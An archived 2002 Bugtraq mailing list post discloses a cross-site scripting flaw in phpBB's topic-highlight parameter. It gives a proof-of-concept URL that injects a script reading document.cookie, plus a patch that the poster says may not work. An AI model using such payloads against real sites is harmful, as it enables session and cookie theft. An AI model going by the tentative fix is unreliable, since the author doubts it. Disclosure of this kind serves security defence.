Bugtraq mailing list archives
XSS bug in phpBB
From: Arab VieruZ <arabviersus () hotmail com>
Date: 18 Nov 2002 12:33:41 -0000
Vulnerable systems: The Last ver Exploit: http://phpbb.com/phpBB/viewtopic.php? t=17071&highlight=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> (without "*") Solution: i think that will work , but im not sure open viewtopic.php and put this code $highlight = htmlspecialchars($highlight); $highlight = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $highlight);
Current thread:
- XSS bug in phpBB Arab VieruZ (Nov 20)